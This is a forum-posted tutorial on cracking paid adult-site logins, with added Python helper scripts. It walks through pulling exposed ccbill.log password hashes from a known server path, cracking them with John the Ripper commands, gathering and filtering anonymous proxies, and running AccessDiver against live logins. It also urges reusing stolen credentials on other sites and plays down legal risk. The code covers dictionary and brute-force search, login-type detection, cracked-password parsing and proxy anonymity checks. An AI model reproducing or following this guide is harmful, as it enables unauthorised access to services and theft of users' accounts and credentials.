Okay the tutorial has been ported for forum use by voide and is located below, thanks voidz0r!
edit: Okay, I had to take out the hosted images because they were bogging down my crappy home server. So I added direct links to the images. This thread will load faster too. Sorry for any troubles.
You can contribute by posting relevant links!
Contributions by: X-Intruder, vOidE
The famous old John the Ripper: http://www.openwall.com/john/
The What's and How's of Bruteforce and Dictionary attacks.
Written by: NoUse
If you are under the age of 18 and do not like pr0n, I would advise you to leave. If you like pr0n and want all the free pr0n you can get by craxz0ring pr0n sites, read this article on bruteforcing so you can get all the free pr0n.
If you plan on following along, you will need the >available package<
"When a thief goes to rob a car he doesn’t have one set plan of how he is going to break into the car, he checks the environment first then makes his decision of how he is going to carry out the illegal operation."
II. What are brute force and dictionary attacks?
III. How do I crack?
As some of you probably already know, there are a LOT of brute forcing tutorials out there already. So you may be wondering why I would waste my time writing another. Well, it is true that there are lots of tutorials out there already, but what many of them fail at is making sure the reader knows and understands how to turn that knowledge into a full scale attack. That is why I am here: to explain and demonstrate how to do just that.
II. What are brute force and dictionary attacks?
To begin with, it is important to note that dictionary attacks and brute force attacks are not the same thing. A brute force attack (or brute forcing for short) tries EVERY possible combination of characters, one after another, until one of them matches the password. A dictionary attack instead runs a list of words (the dictionary) against the password to see if any of them match. Brute forcing can come in handy sometimes, but because the number of combinations grows exponentially with the password length it is usually a waste of time (depending on the situation). So in this tutorial we will mostly be talking about dictionary attacks, although I may keep calling it brute forcing.
There are two types of dictionary attack, online and offline. Which one you use depends solely on the situation:
[Offline] Cracking a SAM password file (you have the hashes and test your guesses locally, as fast as your machine can hash).
[Online] Cracking an FTP password (every guess is a login attempt against the live server, so the server's speed and logging limit you).
Please note that those are just two examples of dictionary attacks; there are many ways to perform these types of attacks.
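Here is an added example (my own Python, not code from the tutorial or from any of the tools it mentions) that makes the offline dictionary-versus-brute-force point concrete: a handful of john-style mangling rules applied to a tiny constructed wordlist find a password like "Summer2004" in a couple of dozen guesses, while an exhaustive search over even a small character set needs millions. The target is a constructed SHA-256 hash rather than a DES crypt hash, because the crypt module is gone from current Python and the search, not the hash function, is what this shows.

```python
"""Dictionary attack with mangling rules versus exhaustive brute force.

Added example for this tutorial; it is not code from the original post or
from any of the tools it mentions. The target is a constructed SHA-256 hash
rather than a DES crypt hash (the crypt module is gone from current Python),
because the point here is the search, not the hash function.
"""
import hashlib
import itertools
import string
from typing import Iterator, Optional, Tuple

# Constructed: a tiny wordlist standing in for a real dictionary file.
WORDLIST = ["password", "summer", "letmein", "tease", "monkey"]


def sha256_hex(candidate: str) -> str:
    return hashlib.sha256(candidate.encode()).hexdigest()


def mangle(word: str) -> Iterator[str]:
    """Yield john-style variations of one word in a fixed order: the word
    as-is, capitalised and upper-cased, each with common suffixes, then a
    leet-speak version. Real rule sets are much bigger; these are assumptions."""
    variants = []
    for v in (word, word.capitalize(), word.upper()):
        if v not in variants:
            variants.append(v)
    for v in variants:
        yield v
        for suffix in ("1", "123", "2004", "04"):
            yield v + suffix
    yield word.translate(str.maketrans("aeo", "@30"))


def dictionary_attack(target_hash: str, wordlist=WORDLIST) -> Tuple[Optional[str], int]:
    """Try every mangled wordlist entry; return (password or None, guesses made)."""
    tried = 0
    for word in wordlist:
        for candidate in mangle(word):
            tried += 1
            if sha256_hex(candidate) == target_hash:
                return candidate, tried
    return None, tried


def keyspace(charset: str, max_len: int) -> int:
    """Number of candidates an exhaustive search covers for lengths 1..max_len."""
    n = len(charset)
    return sum(n ** k for k in range(1, max_len + 1))


def brute_force(target_hash: str, charset: str, max_len: int) -> Tuple[Optional[str], int]:
    """Exhaustive search, shortest candidates first; only sane for tiny key spaces."""
    tried = 0
    for length in range(1, max_len + 1):
        for chars in itertools.product(charset, repeat=length):
            tried += 1
            candidate = "".join(chars)
            if sha256_hex(candidate) == target_hash:
                return candidate, tried
    return None, tried


if __name__ == "__main__":
    target = sha256_hex("Summer2004")  # constructed victim password
    print("dictionary:", dictionary_attack(target))
    print("brute force (a-z, <=3):", brute_force(sha256_hex("cab"), string.ascii_lowercase, 3))
    print("guesses for a-z up to 3 chars:", keyspace(string.ascii_lowercase, 3))
    print("guesses for A-Za-z0-9 up to 8 chars:", keyspace(string.ascii_letters + string.digits, 8))
```

The dictionary run finds "Summer2004" on guess 25; the brute force over lowercase a-z up to three characters needs 2056 guesses just to reach "cab", and for eight mixed-case alphanumerics the full key space is over 2 x 10^14 candidates, which is why the tutorial treats incremental mode as the last resort.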
III. How do I crack?
Cracking is an ambiguous term, so I must define it now. There are multiple types of "cracking", such as cracking a software application or a SAM/.pwl file. There are also the online types of "cracking", such as running a dictionary attack against a pr0n site's login. In this tutorial I will be referring to the cracking of online website logins.
[you] Okay, so how do I crack?
The most common (and effective) way of cracking is to obtain a reliable brute forcer. There are many out there, but to name a few:
Note: All of these brute forcers also have dictionary attack capabilities.
- If you read my >Hackology<
article, you should be able to predict how this will perform.
- Haven't tried this one, but by the looks of it and all of MooRer's other applications I assume it would perform quite well.
- A pretty decent brute forcer, performs well.
- This one is my favorite. It is reliable, has proxy support, and also has many other features that are very useful when preparing to brute force. This is also the one we will be using in the demonstration. You can grab it >here<
There are many more different brute forcers out there; those are just the most popular ones as of 2004. The next step is configuration. Configuration varies from brute forcer to brute forcer, but they all generally have the same basic options. It is very important to know what you are doing when configuring your brute forcer. This is the hardest part for newbs, because they don't research what certain options do/mean and then get all disappointed when it doesn't perform properly. When bruting, you must know what type of authentication the site is using, because trying to brute force a form login with the basic authentication setting just isn't going to work: the tool would be sending its guesses in a header the site never looks at. So here is the difference between the two basic kinds of web login:
o Basic Authentication
This is the password prompt that you see at most porn sites. It is called Basic Authentication (HTTP Basic auth). The server answers a request for the protected directory with a 401 status and a WWW-Authenticate: Basic header, and the browser shows a little pop-up box asking for a username and password. The browser then resends the request with an Authorization: Basic header carrying "username:password" base64-encoded. That is encoding, not encryption: anyone who can see the request can read the credentials.
o Form/cgi login
This is the type of login you see at places like hotmail and geocities. The username and password fields are "built in" to the page as an HTML form instead of a pop-up, and submitting the form sends the fields to a CGI script or other server-side program that checks them and usually sets a cookie or redirects on success.
Now as for the different request methods, you will most likely be using "GET" for most of your bruting experiences. "GET" is the original way to retrieve (hence GET) a page, with any parameters in the URL, while "POST" sends data in the body of the request and is used for things like sending mail, updating data or submitting a login form. Basic authentication works with either, because the credentials travel in a header, but a form login almost always has to be POSTed to whatever script the form's action attribute points at. AccessDiver uses "a fast access method to test standard security", which we will be using in the demonstration.
There are many other options in brute forcers, but the rest are pretty self-explanatory. The type of login and the request method are really all you need to know.
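Since getting the login type wrong is the number one configuration mistake, here is an added example (my own Python, not from the tutorial or AccessDiver) that reads a server's reply and tells you which setting you need: a 401 with a WWW-Authenticate: Basic header means Basic auth, a page containing a form means a form/cgi login, and for the form it pulls out the method, the action script and the field names you would have to fill in. It also builds and decodes the Authorization header to show that Basic auth is just base64. Both HTTP replies are constructed for the example, not captured from any site.

```python
"""Tell a Basic-auth login from a form login from the server's reply, and
show what a Basic Authorization header really carries.

Added example; not code from the tutorial or from AccessDiver. Both HTTP
replies below are constructed for the example, not captured from any site.
"""
import base64
import re
from typing import Dict, Tuple

# Constructed reply for a directory behind HTTP Basic authentication.
BASIC_REPLY = (
    "HTTP/1.1 401 Authorization Required\r\n"
    "Server: Apache\r\n"
    'WWW-Authenticate: Basic realm="members"\r\n'
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><h1>Authorization Required</h1></body></html>"
)

# Constructed reply for a page with a form/cgi login.
FORM_REPLY = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<html><body><form method="post" action="/cgi-bin/login.cgi">\n'
    '<input type="text" name="login">\n'
    '<input type="password" name="passwd">\n'
    '<input type="submit" value="Go">\n'
    "</form></body></html>"
)


def parse_response(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Split a raw HTTP reply into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def classify_login(raw: str) -> Dict[str, object]:
    """Decide which brute-forcer setting fits: 'basic' (credentials go in an
    Authorization header, any method) or 'form' (fields sent to the action URL)."""
    status, headers, body = parse_response(raw)
    challenge = headers.get("www-authenticate", "")
    if status == 401 and challenge.lower().startswith("basic"):
        realm = re.search(r'realm="([^"]*)"', challenge)
        return {"type": "basic", "realm": realm.group(1) if realm else ""}
    form = re.search(r"<form[^>]*>", body, re.IGNORECASE)
    if form:
        tag = form.group(0)
        method = re.search(r"method=[\"']?(\w+)", tag, re.IGNORECASE)
        action = re.search(r"action=[\"']?([^\s\"'>]+)", tag, re.IGNORECASE)
        fields = re.findall(r"<input[^>]*name=[\"']?([\w\-]+)", body, re.IGNORECASE)
        return {
            "type": "form",
            "method": method.group(1).upper() if method else "GET",  # HTML default
            "action": action.group(1) if action else "",
            "fields": fields,
        }
    return {"type": "unknown"}


def basic_header(user: str, password: str) -> str:
    """Build the Authorization value a browser sends after the pop-up: base64 of
    'user:password'. Base64 is encoding, not encryption."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def decode_basic_header(value: str) -> Tuple[str, str]:
    """Recover the credentials from an Authorization: Basic header. Only the
    first colon separates user from password, so passwords may contain ':'."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


if __name__ == "__main__":
    print(classify_login(BASIC_REPLY))
    print(classify_login(FORM_REPLY))
    print(basic_header("Aladdin", "open sesame"))
    print(decode_basic_header(basic_header("Aladdin", "open sesame")))
```

The "Aladdin"/"open sesame" pair is the example from the HTTP Basic auth RFC and encodes to QWxhZGRpbjpvcGVuIHNlc2FtZQ==, so you can check the output against the standard.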
In this demonstration, we will be using >AccessDiver< to crack a basic authentication login. Since we will be cracking a basic authentication login from a porn site, there are a couple of things to learn ahead of time about cracking porn sites. You probably won't be needing these steps if you aren't planning on cracking porn sites, but it is good to get some background on whatever you are cracking nonetheless.
1. What billing company they are using.
2. What restrictions the billing company uses for their usernames and passwords. (This is really only important if you plan on making your own word list.)
The purpose of finding out what billing company the porn site uses is to:
a) Hopefully, find and crack .log files of that specific billing company.
b) Find a username and passlist for that billing company.
Now you are probably sitting here baffled as to what a billing company is, what a .log file of that company is, how to find out which billing company the porn site uses, and how to find .log files of that billing company. Well, that is why I am here. A billing company is a third party that takes the user's credit card payment on the porn site's behalf in exchange for a username and password. Not much to it, it's pretty straightforward. It's not a difficult task to find out which billing company the porn site is using. For example, take a look at the screen shot below. I decided I would be cracking OnlyTease.com today, so here is how to find the billing company of OnlyTease.
The name of the billing company will always be listed around the "join" section of porn sites. As you can tell, it's listed 3 times at onlytease.
So now that you know how to find out what billing company the porn site is using, how do you know what restrictions they set on username and passwords? Well, I have the list of restrictions >here<
(I did not compile this list, nor do I take any type of credit for it. Billing companies probably change their restrictions around a lot, so it may not be 100% accurate.) And as the list says, our company (ccbill) has no restrictions on usernames and passwords, so you could probably run any type of wordlist against ccbill sites and still have a chance of cracking a username/pass. But why would we want to do that against a site that already has its ccbill.log available? Looky what I found on onlytease:
ccbill.log files will not always be available to the public (they never should be; a site that leaves this file readable has simply misconfigured its web server). But on certain sites it is available. ccbill.log files, if available, will always be located at /ccbill/secure/ccbill.log. Now you may be wondering, "wtf is this .log file, it looks like random letters and stuff". That is why you need a parser and a cracker. Yup, that's right, we have to do a lot more before we even begin to start cracking. Let me just list what we have to do (and unfortunately, I have to explain all of this to you...):
1. Find a site (ccbill).
2. If ccbill.log is not available from that site, keep looking for ccbill sites that have their ccbill.log available.
3. Parse the ccbill.log file.
4. Crack the ccbill.log file (now our wordlist is ready).
5. Set up AccessDiver with all of its options.
6. Get many, many proxies.
7. Check proxies for speed/accuracy (lose about 1/2 of the proxies).
8. Check proxies for anonymity (lose about 3/4 of what is left, so we keep roughly 12% of the proxies we began with).
9. Repeat steps 6 through 8 until a sufficient number of proxies has been reached (1000 should be fine).
10. Begin cracking.
Don't let the proxy part discourage you. AccessDiver has an amazing tool that will make the process a WHOLE lot faster, we will get to that later.
Okay, so now that we have located the ccbill.log file, we will need to parse the .log file with a ccbill parser. I supplied one in the >package.zip<. So open up Z_nakeR2 and click on the ccbill.log tab; it should look like this:
You will need to create an empty text file to save the result in.
Click on the folder icon to open up the ccbill.log file. Now click on the diskette icon and select the empty text file you created. Now click the hazard symbol to begin. You should get a message box within seconds saying it has finished. The .log file is now parsed and is located in the previously empty text file. If you look at the file now, it has the username and then some weird symbols and/or random letters for the password. The passwords are not stored in the clear: they are hashed with the Unix crypt(3) function, which is built on >DES<. A traditional DES crypt hash is 13 characters long (a 2-character salt followed by 11 characters of hash), only the first 8 characters of the password are used, and the function is fast to compute, which is why it can be cracked pretty easily.
Now we get to use John the Ripper to crack the >DES< hashes (I know you've always wanted to use John). I supplied a command line version of john in the package.zip. Put your newly parsed ccbill log file in the same directory as john.
The easiest way to do this is to put the whole john folder in c:\ so you won't have to navigate far. So to get started, go to your command prompt (Start >> Run >> cmd, then hit Enter). If you aren't on an NT machine you will have to substitute command for cmd. Now navigate to the folder that john is located in. If you put the whole john folder in c:\, all you should have to type is:
"cd c:\john-16d\john-16\run" *enter*
But if you don't know how to use a command prompt at this point, perhaps you should do some more learning before you even attempt to crack any sites.
Now all you should have to type is:
"john -i [name of your parsed log file].txt" *enter*
Some other JTR commands (John 1.6 syntax; current versions spell these --single, --wordlist=list.txt, --rules, --incremental and --show) are as follows:
-single crack mode (fast; tries the usernames and simple variations of them): john -si ccbill.txt
-wordlist attack: john -w:list.txt ccbill.txt
-heavy wordlist attack (wordlist plus mangling rules): john -w:list.txt -rules ccbill.txt
-incremental mode, i.e. real brute force, the heaviest attack: john -i ccbill.txt
-only numbers: john -i:digits ccbill.txt
-only letters: john -i:alpha ccbill.txt
And as you can tell, we are executing the really heavy attack. This attack may take a long time; I usually let it run overnight and it usually finishes up. If it takes longer than a night I'll stop it and just extract the usernames and passwords it has already cracked.
To save the cracked file just execute the command:
"john -show [name of your parsed log file].txt > result.txt"
And all of the username/passwords will be saved to result.txt.
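Here is an added example (my own Python, not code from the tutorial, Z_nakeR2, Raptor or John) for the two bits of file juggling around the cracking step: merging several parsed ccbill logs into one user:hash list while dropping duplicates and junk lines (the job the Raptor note at the end of the tutorial mentions), and turning result.txt from "john -show" into a clean username:password list for the brute forcer. It assumes the parsed log has exactly two fields, user:hash, so that john -show prints user:password lines followed by its "N password hashes cracked, M left" trailer; all the sample text is constructed.

```python
"""Turn 'john -show' output into a clean username:password list, and merge
several parsed ccbill logs into one before cracking.

Added example; not code from the tutorial, Z_nakeR2, Raptor or John. It assumes
the parsed log has exactly two fields, user:hash, so john -show prints
user:password followed by a 'N password hashes cracked, M left' trailer.
All sample text here is constructed.
"""
import re
from typing import List, Tuple

# Constructed: what result.txt might hold after 'john -show parsed.txt > result.txt'.
SHOW_OUTPUT = """amy:Summer2004
bob:letmein
amy:Summer2004
carl:p@ss:word

4 password hashes cracked, 2 left
"""

# Constructed parsed logs (user:hash) as the parser would write them.
LOG_A = "amy:abJnggxhB/yWI\nbob:ab3x7RmVYIkLk\n"
LOG_B = "bob:ab3x7RmVYIkLk\ncarl:bc9Q3dFpQwq1E\nbroken line without colon\n"

DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")
TRAILER = re.compile(r"^\d+ password hash(es)? cracked, \d+ left$")


def looks_like_des_crypt(hash_field: str) -> bool:
    """Traditional DES crypt: 2 salt chars + 11 hash chars, all from [./0-9A-Za-z]."""
    return bool(DES_CRYPT.match(hash_field))


def merge_parsed_logs(*logs: str) -> List[str]:
    """Combine several parsed logs into one user:hash list, dropping duplicates
    and lines that are not well-formed DES crypt entries (what Raptor is for)."""
    seen = set()
    merged = []
    for text in logs:
        for line in text.splitlines():
            user, sep, hash_field = line.strip().partition(":")
            if not sep or not user or not looks_like_des_crypt(hash_field):
                continue
            entry = f"{user}:{hash_field}"
            if entry not in seen:
                seen.add(entry)
                merged.append(entry)
    return merged


def combos_from_show(text: str) -> List[Tuple[str, str]]:
    """Parse john -show output into unique (user, password) pairs. Everything
    after the first colon is the password, so passwords containing ':' survive."""
    combos = []
    for line in text.splitlines():
        line = line.rstrip("\r\n")
        if not line or TRAILER.match(line):
            continue
        user, sep, password = line.partition(":")
        if sep and (user, password) not in combos:
            combos.append((user, password))
    return combos


if __name__ == "__main__":
    print(merge_parsed_logs(LOG_A, LOG_B))
    for user, password in combos_from_show(SHOW_OUTPUT):
        print(f"{user}:{password}")
```

Dropping duplicate hashes before cracking matters more than it looks: the same user:hash showing up in three merged logs would otherwise cost you three times the DES work in incremental mode.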
Now, let's get AccessDiver configured. Just follow each of these screen shots exactly.
Okay, now that we have AccessDiver configured properly, we are going to need some proxies. You can get proxies however you like, but I found that the easiest way is to use AccessDiver's Web Proxy Leecher:
Once you have leeched those proxies, click on the button "add these proxies in.." and add them to your proxy analyzer. Once you are at the proxy analyzer, do the speed/accuracy test and wait until it has completed. Now click on the brush and delete bad results and timed out.
Now go to the proxy judge tab down at the bottom and click on a proxy judge website (a page that echoes back the connecting IP and the request headers it received, which is how the confidentiality test can tell whether a proxy leaks your real address). Then do the confidentiality test.
After the test is finished, go back to the paintbrush tool and "delete everything non-operational and not anonymous".
Now click the "USE Proxy" and add selected proxies into your proxy list.
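As an added example of what the speed and confidentiality tests are deciding (my own Python, not AccessDiver's code), here is the classification a proxy judge makes explicit. The judge simply echoes the address it saw the connection come from and the request headers: if the address is yours, the proxy was not used at all; if your address turns up in a header such as X-Forwarded-For, the proxy is transparent; if headers like Via are present but your address is not, it is anonymous; if nothing gives the proxy away it is high-anonymous. The judge output format (KEY = value lines), the addresses and the timings below are all constructed.

```python
"""Classify proxies from proxy-judge output, the way the confidentiality test
does, and keep only the fast, anonymous ones.

Added example; not AccessDiver's code. A proxy judge is just a script that
echoes the connecting address and the request headers it received. The judge
output format (KEY = value lines) and all addresses below are constructed,
using documentation ranges.
"""
import re
from typing import Dict, List, Tuple

MY_IP = "203.0.113.7"  # constructed: the address the tests are run from

# Headers a badly configured proxy uses to pass on the client's real address.
LEAKING = ("HTTP_X_FORWARDED_FOR", "HTTP_FORWARDED", "HTTP_CLIENT_IP", "HTTP_X_REAL_IP")
# Headers that do not carry the address but still show a proxy is in the path.
MARKERS = ("HTTP_VIA", "HTTP_X_PROXY_ID", "HTTP_PROXY_CONNECTION", "HTTP_X_CACHE") + LEAKING

# Constructed judge replies: (proxy, seconds to answer, judge page text).
RESULTS: List[Tuple[str, float, str]] = [
    ("198.51.100.10:3128", 0.8,
     "REMOTE_ADDR = 198.51.100.10\nHTTP_VIA = 1.1 squid\nHTTP_X_FORWARDED_FOR = 203.0.113.7\n"),
    ("198.51.100.11:8080", 1.9,
     "REMOTE_ADDR = 198.51.100.11\nHTTP_VIA = 1.0 proxy.example\n"),
    ("198.51.100.12:80", 0.4,
     "REMOTE_ADDR = 198.51.100.12\nHTTP_USER_AGENT = Mozilla/4.0\n"),
    ("198.51.100.13:8000", 9.5,
     "REMOTE_ADDR = 198.51.100.13\n"),
    ("198.51.100.14:3128", 0.5,
     "REMOTE_ADDR = 203.0.113.7\n"),
]


def parse_judge(text: str) -> Dict[str, str]:
    """Read 'NAME = value' lines from a judge page into a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*=\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def classify(judge_text: str, my_ip: str = MY_IP) -> str:
    """'not a proxy': the judge saw you directly. 'transparent': your address
    is passed on in a header. 'anonymous': address hidden but the proxy
    announces itself. 'high-anonymous': indistinguishable from a direct client."""
    fields = parse_judge(judge_text)
    if fields.get("REMOTE_ADDR") == my_ip:
        return "not a proxy"
    if any(my_ip in fields.get(h, "") for h in LEAKING):
        return "transparent"
    if any(h in fields for h in MARKERS):
        return "anonymous"
    return "high-anonymous"


def usable_proxies(results, max_seconds: float = 5.0, my_ip: str = MY_IP) -> List[Tuple[str, str]]:
    """The two cuts from the tutorial: drop slow or dead proxies first, then
    drop everything that is not at least anonymous."""
    kept = []
    for proxy, seconds, judge_text in results:
        if seconds > max_seconds:
            continue
        level = classify(judge_text, my_ip)
        if level in ("anonymous", "high-anonymous"):
            kept.append((proxy, level))
    return kept


if __name__ == "__main__":
    for proxy, seconds, judge_text in RESULTS:
        print(f"{proxy:20} {seconds:4.1f}s {classify(judge_text)}")
    print("usable:", usable_proxies(RESULTS))
```

Of the five constructed proxies only two survive both cuts, which is about the attrition the step list above predicts; note that the transparent one is also the fastest, so sorting by speed alone would have kept exactly the proxy that hands over your address.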
Now start ownez0ring the site!
And wait until it finishes running. This is the first time I've brute forced this particular porn site, but the funny thing is, I got 300 username and passes out of it!
That is basically all there is to it. Not too difficult, and the same rules can be applied to any other sites as well.
Bruteforcing is extremely easy and you won't be considered leet if you crack any sites. You don't really have to worry about lawsuits if you don't use "all" anonymous proxies if you are just cracking porn sites, because I doubt they would actually take the time to take you to court over a 20 dollar account.
ccbill.log files can and should be tried on sites other than the one you found the log file on. Most people who pay for an account on a porn site are likely to pay for more porn sites and are likely to use the same password, therefore it would be a good idea to run the same list against different sites. Comprende? I hope you enjoy free pr0n.
Final note: I rushed this tutorial, so it may not be as detailed as it could be. Bruteforcing shouldn't need a 100 page tutorial though, it's too easy for that.
Oh yeah, Raptor is used to combine .log files into one huge file... forgot to mention, it's in the >package.zip< if you need it.